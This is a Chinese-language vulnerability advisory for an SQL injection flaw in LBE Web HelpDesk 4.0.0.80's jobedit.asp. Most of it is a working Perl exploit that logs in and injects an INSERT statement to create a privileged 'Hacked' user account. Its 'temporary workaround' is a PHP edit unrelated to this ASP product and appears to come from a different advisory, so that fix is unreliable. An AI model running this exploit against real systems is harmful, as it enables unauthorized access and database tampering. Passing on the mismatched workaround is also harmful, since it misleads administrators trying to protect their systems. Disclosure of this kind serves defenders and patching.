发布日期：2004-07-21
更新日期：2004-07-27

受影响系统：

Leigh Business Enterprises Web HelpDesk 4.0.0.80

不受影响系统：

Leigh Business Enterprises Web HelpDesk 4.0.0.81

描述：

---

BUGTRAQ  ID: 10773

LBE Web Helpdesk是一款可通过WEB浏览器进行操作的Helpdesk系统。

LBE Web Helpdesk不正确过滤用户提交的数据，远程攻击者可以利用这个漏洞进行SQL注入攻击，可能获得敏感数据或修改数据库。

问题存在于jobedit.asp脚本对用户提交给'id'参数缺少过滤，提交包含恶意SQL命令的数据作为'id'参数，可修改'users'表，增加操作员相等权限的新用户。

<*来源：Noam Rathaus （noamr@beyondsecurity.com）
  
  链接：http://www.securiteam.com/windowsntfocus/5QP0M0ADGI.html
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Noam Rathaus （noamr@beyondsecurity.com）提供了如下测试方法：

#!/usr/bin/perl

use IO::Socket;
use strict;

my $host = $ARGV[0];
my $Path = $ARGV[1];
my $Email = $ARGV[2];
my $Password = $ARGV[3];

if (($#ARGV+1) < 4)
{
print "lbehelpdesk.pl host path email password\n";
exit(0);
}

my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => "80" );

unless ($remote) { die "cannot connect to http daemon on $host" }

print "Getting default cookie\n";

my $http = "GET /$Path/oplogin.asp HTTP/1.1
Host: $host
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040405 Firefox/0.8
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,ima
ge/gif;q=0.2,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: close

";

print "HTTP: [$http]\n";
print $remote $http;
sleep(1);

my $Cookie = "";

while (<$remote>)
{
if (/Set-Cookie: ([^;]+;)/)
{
  $Cookie .= $1." ";
}

# print $_;
}
print "\n";

close($remote);

$remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => "80" );

unless ($remote) { die "cannot connect to http daemon on $host" }

print "Logging in\n";

$remote->autoflush(1);

my $http = "POST /$Path/gstlogin.asp HTTP/1.1
Host: $host
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040405 Firefox/0.8
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: close
Referer: http://192.168.1.243/lbehelpdesk/gstlogin.asp
Cookie: $Cookie
Content-Type: application/x-www-form-urlencoded
Content-Length: ";

my $content = "txtemail=$Email&txtpwd=$Password";

$http .= length($content)."

$content";

print "HTTP: [$http]\n";
print $remote $http;
sleep(1);

my $success = 0;
while (<$remote>)
{
if (/Location: eval.asp/)
{
  $success = 1;
  print "Login successfull\n";
}

# print $_;
}
print "\n";

close $remote;

if (!$success)
{
print "Login failed\n";
exit(0);
}

$http = "GET /$Path/jobedit.asp?id=0%20;%20INSERT%20INTO%20users%20(%20user_name,".
"%20password,%20editactiontime,%20orgstructure,%20createviewtemplate,".
"%20removelogins,%20editlinkedfiles,%20newencrypt,%20showalljobs,".
"%20publishmacros,%20override_contract%20)%20VALUES%20('Hacked',".
"%20'60716363677F6274',%201,%201,%201,%201,%201,%20'Y',%201,".
"%201,%201) HTTP/1.1
Host: $host
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040405 Firefox/0.8
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: close
Referer: http://192.168.1.243/lbehelpdesk/gstlogin.asp
Cookie: $Cookie

";

$remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => "80" );

unless ($remote) { die "cannot connect to http daemon on $host" }

print "HTTP: [$http]\n";
print $remote $http;
sleep(1);

while (<$remote>)
{
if (/Unable to find Job id = 0 ; INSERT INTO users/g)
{
  print "Successfully added record\nYou can now log on as Hacked/password (Username/Password)\n";
}
# print $_;
}

close($remote);

建议：

---

临时解决方法：

如果您不能立刻安装补丁或者升级，NSFOCUS建议您采取以下措施以降低威胁：

* 在$nick = htmlspecialchars($nick);前插入if ($cadena_final) { unset($cadena_final); }代码。

厂商补丁：

Leigh Business Enterprises
--------------------------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

Leigh Business Enterprises Web HelpDesk 4.0 .0.80:

Leigh Business Enterprises Upgrade weblatest.zip
http://www.lbehelpdesk.com/patch/web/weblatest.zip

浏览次数：2935
严重程度：0（网友投票）